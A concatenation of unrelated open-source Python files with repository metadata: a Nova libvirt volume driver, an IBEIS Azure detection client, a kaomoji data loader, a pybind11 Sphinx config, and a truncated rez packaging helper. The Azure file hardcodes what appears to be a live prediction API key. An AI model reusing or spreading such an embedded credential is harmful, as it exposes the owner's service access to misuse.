from nova.virt.libvirt import config as vconfig
from nova.virt.libvirt import utils as libvirt_utils
LOG = logging.getLogger(__name__)
volume_opts = [
cfg.IntOpt('num_iscsi_scan_tries',
default=5,
help='Number of times to rescan iSCSI target to find volume'),
cfg.IntOpt('num_iser_scan_tries',
default=5,
help='Number of times to rescan iSER target to find volume'),
cfg.StrOpt('rbd_user',
help='The RADOS client name for accessing rbd volumes'),
cfg.StrOpt('rbd_secret_uuid',
               help='The libvirt UUID of the secret for the rbd_user '
'volumes'),
cfg.StrOpt('nfs_mount_point_base',
default=paths.state_path_def('mnt'),
help='Directory where the NFS volume is mounted on the'
' compute node'),
cfg.StrOpt('nfs_mount_options',
help='Mount options passed to the NFS client. See section '
'of the nfs man page for details'),
cfg.BoolOpt('iscsi_use_multipath',
default=False,
help='Use multipath connection of the iSCSI volume'),
cfg.BoolOpt('iser_use_multipath',
default=False,
help='Use multipath connection of the iSER volume'),
cfg.ListOpt('qemu_allowed_storage_drivers',
default=[],
help='Protocols listed here will be accessed directly '
'from QEMU. Currently supported protocols: [gluster]'),
cfg.StrOpt('iscsi_iface',
deprecated_name='iscsi_transport',
help='The iSCSI transport iface to use to connect to target in '
'case offload support is desired. Default format is of '
'the form <transport_name>.<hwaddress> where '
'<transport_name> is one of (be2iscsi, bnx2i, cxgb3i, '
                    'cxgb4i, qla4xxx, ocs) and <hwaddress> is the MAC address '
'of the interface and can be generated via the '
'iscsiadm -m iface command. Do not confuse the '
'iscsi_iface parameter to be provided here with the '
'actual transport name.'),
# iser is also supported, but use LibvirtISERVolumeDriver
# instead
]
CONF = cfg.CONF
CONF.register_opts(volume_opts, 'libvirt')
class LibvirtBaseVolumeDriver(object):
"""Base class for volume drivers."""
def __init__(self, connection, is_block_dev):
self.connection = connection
self.is_block_dev = is_block_dev
def get_config(self, connection_info, disk_info):
"""Returns xml for libvirt."""
conf = vconfig.LibvirtConfigGuestDisk()
conf.driver_name = libvirt_utils.pick_disk_driver_name(
self.connection._host.get_version(),
self.is_block_dev
)
conf.source_device = disk_info['type']
conf.driver_format = "raw"
conf.driver_cache = "none"
conf.target_dev = disk_info['dev']
conf.target_bus = disk_info['bus']
conf.serial = connection_info.get('serial')
# Support for block size tuning
data = {}
if 'data' in connection_info:
data = connection_info['data']
if 'logical_block_size' in data:
conf.logical_block_size = data['logical_block_size']
if 'physical_block_size' in data:
conf.physical_block_size = data['physical_block_size']
# Extract rate_limit control parameters
if 'qos_specs' in data and data['qos_specs']:
tune_opts = ['total_bytes_sec', 'read_bytes_sec',
'write_bytes_sec', 'total_iops_sec',
'read_iops_sec', 'write_iops_sec']
specs = data['qos_specs']
if isinstance(specs, dict):
for k, v in six.iteritems(specs):
if k in tune_opts:
new_key = 'disk_' + k
setattr(conf, new_key, v)
else:
LOG.warn(_LW('Unknown content in connection_info/'
'qos_specs: %s'), specs)
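            # Illustrative mapping (values hypothetical): a qos_specs dict such
            # as {'total_bytes_sec': '1048576'} ends up on the generated config
            # as conf.disk_total_bytes_sec = '1048576'.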
# Extract access_mode control parameters
if 'access_mode' in data and data['access_mode']:
access_mode = data['access_mode']
if access_mode in ('ro', 'rw'):
conf.readonly = access_mode == 'ro'
else:
LOG.error(_LE('Unknown content in '
'connection_info/access_mode: %s'),
access_mode)
raise exception.InvalidVolumeAccessMode(
access_mode=access_mode)
return conf
def _get_secret_uuid(self, conf, password=None):
secret = self.connection._host.find_secret(conf.source_protocol,
conf.source_name)
if secret is None:
secret = self.connection._host.create_secret(conf.source_protocol,
conf.source_name,
password)
return secret.UUIDString()
def _delete_secret_by_name(self, connection_info):
source_protocol = connection_info['driver_volume_type']
netdisk_properties = connection_info['data']
if source_protocol == 'rbd':
return
elif source_protocol == 'iscsi':
usage_type = 'iscsi'
usage_name = ("%(target_iqn)s/%(target_lun)s" %
netdisk_properties)
self.connection._host.delete_secret(usage_type, usage_name)
def connect_volume(self, connection_info, disk_info):
"""Connect the volume. Returns xml for libvirt."""
pass
def disconnect_volume(self, connection_info, disk_dev):
"""Disconnect the volume."""
pass
class LibvirtVolumeDriver(LibvirtBaseVolumeDriver):
"""Class for volumes backed by local file."""
def __init__(self, connection):
super(LibvirtVolumeDriver,
self).__init__(connection, is_block_dev=True)
def get_config(self, connection_info, disk_info):
"""Returns xml for libvirt."""
conf = super(LibvirtVolumeDriver,
self).get_config(connection_info, disk_info)
conf.source_type = "block"
conf.source_path = connection_info['data']['device_path']
return conf
class LibvirtFakeVolumeDriver(LibvirtBaseVolumeDriver):
"""Driver to attach fake volumes to libvirt."""
def __init__(self, connection):
super(LibvirtFakeVolumeDriver,
self).__init__(connection, is_block_dev=True)
def get_config(self, connection_info, disk_info):
"""Returns xml for libvirt."""
conf = super(LibvirtFakeVolumeDriver,
self).get_config(connection_info, disk_info)
conf.source_type = "network"
conf.source_protocol = "fake"
conf.source_name = "fake"
return conf
class LibvirtNetVolumeDriver(LibvirtBaseVolumeDriver):
"""Driver to attach Network volumes to libvirt."""
def __init__(self, connection):
super(LibvirtNetVolumeDriver,
self).__init__(connection, is_block_dev=False)
def get_config(self, connection_info, disk_info):
"""Returns xml for libvirt."""
conf = super(LibvirtNetVolumeDriver,
self).get_config(connection_info, disk_info)
netdisk_properties = connection_info['data']
conf.source_type = "network"
conf.source_protocol = connection_info['driver_volume_type']
conf.source_name = netdisk_properties.get('name')
conf.source_hosts = netdisk_properties.get('hosts', [])
conf.source_ports = netdisk_properties.get('ports', [])
auth_enabled = netdisk_properties.get('auth_enabled')
if (conf.source_protocol == 'rbd' and
CONF.libvirt.rbd_secret_uuid):
conf.auth_secret_uuid = CONF.libvirt.rbd_secret_uuid
auth_enabled = True # Force authentication locally
if CONF.libvirt.rbd_user:
conf.auth_username = CONF.libvirt.rbd_user
if conf.source_protocol == 'iscsi':
try:
conf.source_name = ("%(target_iqn)s/%(target_lun)s" %
netdisk_properties)
target_portal = netdisk_properties['target_portal']
except KeyError:
raise exception.NovaException(_("Invalid volume source data"))
ip, port = utils.parse_server_string(target_portal)
if ip == '' or port == '':
raise exception.NovaException(_("Invalid target_lun"))
conf.source_hosts = [ip]
conf.source_ports = [port]
if netdisk_properties.get('auth_method') == 'CHAP':
auth_enabled = True
conf.auth_secret_type = 'iscsi'
password = netdisk_properties.get('auth_password')
conf.auth_secret_uuid = self._get_secret_uuid(conf, password)
if auth_enabled:
conf.auth_username = (conf.auth_username or
netdisk_properties['auth_username'])
conf.auth_secret_type = (conf.auth_secret_type or
netdisk_properties['secret_type'])
conf.auth_secret_uuid = (conf.auth_secret_uuid or
netdisk_properties['secret_uuid'])
return conf
def disconnect_volume(self, connection_info, disk_dev):
"""Detach the volume from instance_name."""
super(LibvirtNetVolumeDriver,
self).disconnect_volume(connection_info, disk_dev)
self._delete_secret_by_name(connection_info)
class LibvirtISCSIVolumeDriver(LibvirtBaseVolumeDriver):
"""Driver to attach Network volumes to libvirt."""
def __init__(self, connection):
super(LibvirtISCSIVolumeDriver, self).__init__(connection,
is_block_dev=True)
# Call the factory here so we can support
# more than x86 architectures.
self.connector = connector.InitiatorConnector.factory(
'ISCSI', utils._get_root_helper(),
use_multipath=CONF.libvirt.iscsi_use_multipath,
device_scan_attempts=CONF.libvirt.num_iscsi_scan_tries,
transport=self._get_transport())
def _get_transport(self):
if CONF.libvirt.iscsi_iface:
transport = CONF.libvirt.iscsi_iface
else:
transport = 'default'
return transport
def get_config(self, connection_info, disk_info):
"""Returns xml for libvirt."""
conf = super(LibvirtISCSIVolumeDriver,
self).get_config(connection_info, disk_info)
conf.source_type = "block"
conf.source_path = connection_info['data']['device_path']
return conf
def connect_volume(self, connection_info, disk_info):
"""Attach the volume to instance_name."""
LOG.debug("Calling os-brick to attach iSCSI Volume")
device_info = self.connector.connect_volume(connection_info['data'])
LOG.debug("Attached iSCSI volume %s", device_info)
connection_info['data']['device_path'] = device_info['path']
def disconnect_volume(self, connection_info, disk_dev):
"""Detach the volume from instance_name."""
LOG.debug("calling os-brick to detach iSCSI Volume")
self.connector.disconnect_volume(connection_info['data'], None)
LOG.debug("Disconnected iSCSI Volume %s", disk_dev)
super(LibvirtISCSIVolumeDriver,
self).disconnect_volume(connection_info, disk_dev)
class LibvirtISERVolumeDriver(LibvirtISCSIVolumeDriver):
"""Driver to attach Network volumes to libvirt."""
def __init__(self, connection):
super(LibvirtISERVolumeDriver, self).__init__(connection)
# Call the factory here so we can support
# more than x86 architectures.
self.connector = connector.InitiatorConnector.factory(
'ISER', utils._get_root_helper(),
use_multipath=CONF.libvirt.iser_use_multipath,
device_scan_attempts=CONF.libvirt.num_iser_scan_tries,
transport=self._get_transport())
def _get_transport(self):
return 'iser'
class LibvirtNFSVolumeDriver(LibvirtBaseVolumeDriver):
"""Class implements libvirt part of volume driver for NFS."""
def __init__(self, connection):
"""Create back-end to nfs."""
super(LibvirtNFSVolumeDriver,
self).__init__(connection, is_block_dev=False)
def _get_device_path(self, connection_info):
path = os.path.join(CONF.libvirt.nfs_mount_point_base,
utils.get_hash_str(connection_info['data']['export']))
path = os.path.join(path, connection_info['data']['name'])
return path
def get_config(self, connection_info, disk_info):
"""Returns xml for libvirt."""
conf = super(LibvirtNFSVolumeDriver,
self).get_config(connection_info, disk_info)
conf.source_type = 'file'
conf.source_path = connection_info['data']['device_path']
conf.driver_format = connection_info['data'].get('format', 'raw')
return conf
def connect_volume(self, connection_info, disk_info):
"""Connect the volume. Returns xml for libvirt."""
options = connection_info['data'].get('options')
self._ensure_mounted(connection_info['data']['export'], options)
connection_info['data']['device_path'] = \
self._get_device_path(connection_info)
def disconnect_volume(self, connection_info, disk_dev):
"""Disconnect the volume."""
export = connection_info['data']['export']
mount_path = os.path.join(CONF.libvirt.nfs_mount_point_base,
utils.get_hash_str(export))
try:
utils.execute('umount', mount_path, run_as_root=True)
except processutils.ProcessExecutionError as exc:
if ('device is busy' in exc.message or
'target is busy' in exc.message):
LOG.debug("The NFS share %s is still in use.", export)
else:
LOG.exception(_LE("Couldn't unmount the NFS share %s"), export)
def _ensure_mounted(self, nfs_export, options=None):
"""@type nfs_export: string
@type options: string
"""
mount_path = os.path.join(CONF.libvirt.nfs_mount_point_base,
utils.get_hash_str(nfs_export))
if not libvirt_utils.is_mounted(mount_path, nfs_export):
self._mount_nfs(mount_path, nfs_export, options, ensure=True)
return mount_path
def _mount_nfs(self, mount_path, nfs_share, options=None, ensure=False):
"""Mount nfs export to mount path."""
utils.execute('mkdir', '-p', mount_path)
# Construct the NFS mount command.
nfs_cmd = ['mount', '-t', 'nfs']
if CONF.libvirt.nfs_mount_options is not None:
nfs_cmd.extend(['-o', CONF.libvirt.nfs_mount_options])
if options:
nfs_cmd.extend(options.split(' '))
nfs_cmd.extend([nfs_share, mount_path])
try:
utils.execute(*nfs_cmd, run_as_root=True)
except processutils.ProcessExecutionError as exc:
if ensure and 'already mounted' in exc.message:
LOG.warn(_LW("%s is already mounted"), nfs_share)
else:
raise
| {
"content_hash": "fd82a0917fe9ba2e46232e1433ccdea7",
"timestamp": "",
"source": "github",
"line_count": 392,
"max_line_length": 79,
"avg_line_length": 41.109693877551024,
"alnum_prop": 0.5851690971144896,
"repo_name": "ruslanloman/nova",
"id": "192f4b3be9acd5799db55bccc6aeabbab3c1665c",
"size": "16814",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "nova/virt/libvirt/volume/volume.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "16289904"
},
{
"name": "Shell",
"bytes": "20716"
},
{
"name": "Smarty",
"bytes": "283675"
}
],
"symlink_target": ""
} |
"""Interface to Azure object proposals."""
from __future__ import absolute_import, division, print_function
import requests
import utool as ut
import numpy as np
from six.moves import zip
from os.path import abspath, dirname, expanduser, join, exists # NOQA
(print, rrr, profile) = ut.inject2(__name__, '[azure]')
VERBOSE_AZURE = ut.get_argflag('--verbazure') or ut.VERBOSE
NPROC_MULTIPLIER = 2
PREDICTION_URL = 'https://southcentralus.api.cognitive.microsoft.com/customvision/v2.0/Prediction/%s/image?iterationId=%s'
PREDICTION_HEADER = {
'Prediction-Key': None,
'Content-Type': 'application/octet-stream'
}
PREDICTION_DICT = {
None : ('9bb5790b-7f59-4c0b-b571-21e68d29f4b2', 'a4fb7280-b0be-4706-91c6-7651d116ac46', '34e5c511adfc449290e10868218906f9'),
}
def detect_gid_list(ibs, gid_list, verbose=VERBOSE_AZURE, **kwargs):
"""Detect gid_list with azure.
    Args:
        ibs (ibeis.IBEISController): image analysis api
        gid_list (list of int): the list of IBEIS image_rowids that need detection
    Kwargs (optional):
        detector, config_filepath, weights_filepath, verbose; refer to the
        Azure documentation for configuration settings
Yields:
tuple: (gid, gpath, result_list)
"""
# Get new gpaths if downsampling
config = {
'draw_annots': False,
'thumbsize': 900,
}
gpath_list = ibs.get_image_thumbpath(gid_list, ensure_paths=True, **config)
size_list = ibs.get_image_sizes(gid_list)
# Run detection
results_iter = detect(gpath_list, verbose=verbose, **kwargs)
# Upscale the results
_iter = zip(gid_list, size_list, results_iter)
for gid, size, (gpath, result_list) in _iter:
width, height = size
# Upscale the results back up to the original image size
for result in result_list:
result['xtl'] = int(np.around(result['xtl'] * width ))
result['ytl'] = int(np.around(result['ytl'] * height))
result['width'] = int(np.around(result['width'] * width ))
result['height'] = int(np.around(result['height'] * height))
yield (gid, gpath, result_list)
def _detect(gpath, prediction_project, prediction_iteration, prediction_model):
with open(gpath, 'rb') as image_file:
data = image_file.read()
prediction_url = PREDICTION_URL % (prediction_project, prediction_iteration, )
prediction_header = PREDICTION_HEADER.copy()
prediction_header['Prediction-Key'] = prediction_model
response = requests.post(url=prediction_url, data=data, headers=prediction_header)
response_json = response.json()
output_list = response_json['predictions']
return output_list
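# Shape of each entry in the list returned above, inferred from the fields
# consumed by detect() below (values are illustrative only):
#
#   {
#       'boundingBox': {'left': 0.1, 'top': 0.2, 'width': 0.3, 'height': 0.4},
#       'tagName': 'zebra',
#       'probability': 0.87,
#   }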
def detect(gpath_list, config_filepath, verbose=VERBOSE_AZURE, **kwargs):
"""Detect image filepaths with azure.
Args:
gpath_list (list of str): the list of image paths that need proposal candidates
Kwargs (optional): refer to the Azure documentation for configuration settings
Returns:
iter
"""
# Get correct weight if specified with shorthand
if config_filepath not in PREDICTION_DICT:
config_filepath = None
prediction = PREDICTION_DICT.get(config_filepath, None)
assert prediction is not None, 'Azure needs to have a model configuration'
prediction_project, prediction_iteration, prediction_model = prediction
prediction_project_list = [prediction_project] * len(gpath_list)
prediction_iteration_list = [prediction_iteration] * len(gpath_list)
prediction_model_list = [prediction_model] * len(gpath_list)
arg_iter = list(zip(gpath_list, prediction_project_list, prediction_iteration_list, prediction_model_list))
nprocs = ut.util_parallel.get_default_numprocs()
nprocs *= NPROC_MULTIPLIER
nprocs = min(nprocs, len(arg_iter))
outputs_list = ut.util_parallel.generate2(_detect, arg_iter, nprocs=nprocs, ordered=True)
# Execute detector for each image
results_list_ = []
for output_list in outputs_list:
result_list_ = []
for output in list(output_list):
result_dict = {
'xtl' : output['boundingBox']['left'],
'ytl' : output['boundingBox']['top'],
'width' : output['boundingBox']['width'],
'height' : output['boundingBox']['height'],
'class' : output['tagName'],
'confidence' : output['probability'],
}
result_list_.append(result_dict)
results_list_.append(result_list_)
if len(results_list_) != len(gpath_list):
raise ValueError('Azure did not return valid data')
results_list = zip(gpath_list, results_list_)
return results_list
| {
"content_hash": "9a1c3fed419ba405589c23818aa49d3b",
"timestamp": "",
"source": "github",
"line_count": 134,
"max_line_length": 129,
"avg_line_length": 36.33582089552239,
"alnum_prop": 0.6553707126720065,
"repo_name": "Erotemic/ibeis",
"id": "9afd9abcdce88352a5f11c4e6e50546f3617f1ec",
"size": "4893",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "ibeis/algo/detect/azure.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "CMake",
"bytes": "331"
},
{
"name": "CSS",
"bytes": "4676"
},
{
"name": "Dockerfile",
"bytes": "13018"
},
{
"name": "Inno Setup",
"bytes": "1585"
},
{
"name": "Python",
"bytes": "6661573"
},
{
"name": "Shell",
"bytes": "56171"
}
],
"symlink_target": ""
} |
from collections import defaultdict
import numpy as np
class DataLoader:
def __init__(self):
self.chars = set()
lines = []
for l in open('./kaomojis'):
self.chars |= set(l[:-1])
lines.append(l[:-1])
self.char_to_idx = { c:i for i,c in enumerate(self.chars) }
self.idx_to_char = { i:c for i,c in enumerate(self.chars) }
self.char_vecs = []
words_num = len(self.chars)
for line in lines:
char_vec = [self.char_to_idx[c] for c in line]
input_vec = [self._one_hot_vec(words_num+1, idx) for idx in char_vec]
output_vec = [self._one_hot_vec(words_num+1, idx) for idx
in char_vec[1:] + [words_num]]
self.char_vecs.append((input_vec, output_vec))
def _one_hot_vec(self, length, char_idx):
vec = np.zeros((length, 1))
vec[char_idx] = 1.0
return vec
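# Illustrative example of the helpers above: _one_hot_vec(4, 2) returns a
# (4, 1) column vector [[0.], [0.], [1.], [0.]]. For every kaomoji line,
# self.char_vecs holds a pair (input_vec, output_vec) in which output_vec is
# input_vec shifted left by one character, with the extra index words_num
# serving as the end-of-sequence target for the final position.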
| {
"content_hash": "69ab43a58cef054b3985557db89954f0",
"timestamp": "",
"source": "github",
"line_count": 29,
"max_line_length": 93,
"avg_line_length": 33.241379310344826,
"alnum_prop": 0.5186721991701245,
"repo_name": "yustoris/kaomoji_with_rnn",
"id": "860cce21771cf34a0031fa6c291a7a958fe137aa",
"size": "964",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "data_loader.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "6743"
}
],
"symlink_target": ""
} |
import sys
import os
import shlex
import subprocess
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['breathe']
breathe_projects = {'pybind11': '.build/doxygenxml/'}
breathe_default_project = 'pybind11'
breathe_domain_by_extension = {'h': 'cpp'}
# Add any paths that contain templates here, relative to this directory.
templates_path = ['.templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'pybind11'
copyright = '2017, Wenzel Jakob'
author = 'Wenzel Jakob'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '2.5'
# The full version, including alpha/beta/rc tags.
release = '2.5.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['.build', 'release.rst']
# The reST default role (used for this markup: `text`) to use for all
# documents.
default_role = 'any'
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
#pygments_style = 'monokai'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
if not on_rtd: # only import and set the theme if we're building docs locally
import sphinx_rtd_theme
html_theme = 'sphinx_rtd_theme'
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
html_context = {
'css_files': [
'_static/theme_overrides.css'
]
}
else:
html_context = {
'css_files': [
'//media.readthedocs.org/css/sphinx_rtd_theme.css',
'//media.readthedocs.org/css/readthedocs-doc-embed.css',
'_static/theme_overrides.css'
]
}
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'h', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'r', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'pybind11doc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
'preamble': '\DeclareUnicodeCharacter{00A0}{}',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'pybind11.tex', 'pybind11 Documentation',
'Wenzel Jakob', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = 'pybind11-logo.png'
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'pybind11', 'pybind11 Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'pybind11', 'pybind11 Documentation',
author, 'pybind11', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
primary_domain = 'cpp'
highlight_language = 'cpp'
def generate_doxygen_xml(app):
build_dir = os.path.join(app.confdir, '.build')
if not os.path.exists(build_dir):
os.mkdir(build_dir)
try:
subprocess.call(['doxygen', '--version'])
retcode = subprocess.call(['doxygen'], cwd=app.confdir)
if retcode < 0:
sys.stderr.write("doxygen error code: {}\n".format(-retcode))
except OSError as e:
sys.stderr.write("doxygen execution failed: {}\n".format(e))
def setup(app):
"""Add hook for building doxygen xml when needed"""
app.connect("builder-inited", generate_doxygen_xml)
| {
"content_hash": "c10c9f194f2a47dcb8c6cf2a47099bfb",
"timestamp": "",
"source": "github",
"line_count": 317,
"max_line_length": 79,
"avg_line_length": 32.22397476340694,
"alnum_prop": 0.6926089084679393,
"repo_name": "BYVoid/OpenCC",
"id": "fa6332de5209efc6b75c65ae42877f798850da77",
"size": "10659",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "deps/pybind11-2.5.0/docs/conf.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "1195"
},
{
"name": "C",
"bytes": "689"
},
{
"name": "C++",
"bytes": "215008"
},
{
"name": "CMake",
"bytes": "15826"
},
{
"name": "JavaScript",
"bytes": "7133"
},
{
"name": "Makefile",
"bytes": "2528"
},
{
"name": "Python",
"bytes": "21569"
},
{
"name": "Shell",
"bytes": "2247"
},
{
"name": "TypeScript",
"bytes": "912"
}
],
"symlink_target": ""
} |
"""
Functions for converting python distributions to rez packages.
"""
from __future__ import print_function
from rez.exceptions import RezSystemError
import pkg_resources
import shutil
import sys
import os
import os.path
import textwrap
def _mkdirs(*dirs):
path = os.path.join(*dirs)
if not os.path.exists(path):
os.makedirs(path)
return path
def convert_name(name):
""" Convert a python distribution name into a rez-safe package name."""
return name.replace('-', '_')
# TODO: change this when version submod is rewritten
# This is just a temporary simplistic implementation for now
def convert_version(version):
"""Convert a python distribution version into a rez-safe version string."""
"""
version = version.replace('-','.')
version = version.lower()
version = re.sub("[a-z]", "", version)
version = version.replace("..", '.')
version = version.replace("..", '.')
version = version.replace("..", '.')
return version
"""
return str(version)
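# Illustrative behaviour of the two helpers above (package name hypothetical):
# convert_name('zope-interface') returns 'zope_interface', while
# convert_version currently just stringifies the version; the quoted block
# above shows the older normalisation logic it replaced.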
# TODO: add native Requirement conversion support into new version submod
def convert_requirement(req):
"""
Converts a pkg_resources.Requirement object into a list of Rez package
request strings.
"""
pkg_name = convert_name(req.project_name)
if not req.specs:
return [pkg_name]
req_strs = []
for spec in req.specs:
op, ver = spec
ver = convert_version(ver)
if op == "<":
r = "%s-0+<%s" % (pkg_name, ver)
req_strs.append(r)
elif op == "<=":
r = "%s-0+<%s|%s" % (pkg_name, ver, ver)
req_strs.append(r)
elif op == "==":
r = "%s-%s" % (pkg_name, ver)
req_strs.append(r)
elif op == ">=":
r = "%s-%s+" % (pkg_name, ver)
req_strs.append(r)
elif op == ">":
r1 = "%s-%s+" % (pkg_name, ver)
r2 = "!%s-%s" % (pkg_name, ver)
req_strs.append(r1)
req_strs.append(r2)
elif op == "!=":
r = "!%s-%s" % (pkg_name, ver)
req_strs.append(r)
else:
print("Warning: Can't understand op '%s', just depending on "
"unversioned package..." % op,
file=sys.stderr)
req_strs.append(pkg_name)
return req_strs
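# Illustrative conversions produced by convert_requirement (names and versions
# hypothetical):
#
#   foo >= 1.2   ->  ['foo-1.2+']
#   foo < 2.0    ->  ['foo-0+<2.0']
#   foo != 1.5   ->  ['!foo-1.5']
#   foo > 1.0    ->  ['foo-1.0+', '!foo-1.0']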
def get_dist_dependencies(name, recurse=True):
"""
Get the dependencies of the given, already installed distribution.
@param recurse If True, recursively find all dependencies.
@returns A set of package names.
    @note The result always includes the top-level package itself.
"""
dist = pkg_resources.get_distribution(name)
pkg_name = convert_name(dist.project_name)
reqs = set()
working = set([dist])
depth = 0
while working:
deps = set()
for distname in working:
dist = pkg_resources.get_distribution(distname)
pkg_name = convert_name(dist.project_name)
reqs.add(pkg_name)
for req in dist.requires():
reqs_ = convert_requirement(req)
deps |= set(x.split('-', 1)[0] for x in reqs_
if not x.startswith('!'))
working = deps - reqs
depth += 1
if (not recurse) and (depth >= 2):
break
return reqs
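# Illustrative usage (the distribution name is hypothetical; the exact set
# returned depends on what is installed in the current python environment):
#
#   deps = get_dist_dependencies("some_dist", recurse=True)
#   # -> a set of rez-safe package names, e.g. set(['some_dist', 'some_dep'])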
# TODO: doesn't deal with executable scripts yet
def convert_dist(name, dest_path, make_variant=True, ignore_dirs=None,
python_requirement="major_minor"):
"""Convert an already installed python distribution into a rez package.
    Args:
        name (str): Name of the installed python distribution to convert.
dest_path (str): Where to put the rez package. The package will be
created under dest_path/<NAME>/<VERSION>/.
make_variant (bool): If True, makes a single variant in the rez package
based on the MAJOR.MINOR version of python.
        ignore_dirs (list of str): Directory names to not copy from the dist.
python_requirement (str): How the package should depend on python.
One of:
- "major": depend on python-X
- "major_minor": depend on python-X.X
- any other value: this string is used as the literal version
range string.
Returns:
Install path of the new Rez package.
"""
dist = pkg_resources.get_distribution(name)
pkg_name = convert_name(dist.project_name)
